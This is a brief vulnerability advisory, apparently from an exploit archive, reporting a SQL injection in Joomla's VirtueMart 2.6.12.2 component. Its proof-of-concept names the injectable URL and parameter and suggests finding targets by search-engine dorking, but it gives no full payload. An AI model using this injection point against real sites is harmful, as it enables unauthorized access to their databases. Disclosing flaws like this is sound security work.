Authored by indoushka

Joomla VirtueMart component version 2.6.12.2 suffers from a remote SQL injection vulnerability.

====================================================================================================================================
| # Title     : Joomla VirtueMart v2.6.12.2 SQL Injection Vulnerability                                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |
| # Vendor    : http://dev.virtuemart.net/attachments/863/com_virtuemart.2.6.12.2.zip                                              |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : index.php/headgear/results,1-60?filter_product=1

[+] http://127.0.0.1/Virtue/index.php/headgear/results,1-60?filter_product=1 = inject her

[+] http://127.0.0.1/Virtue/administrator/

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================

RELATED ARTICLESMORE FROM AUTHOR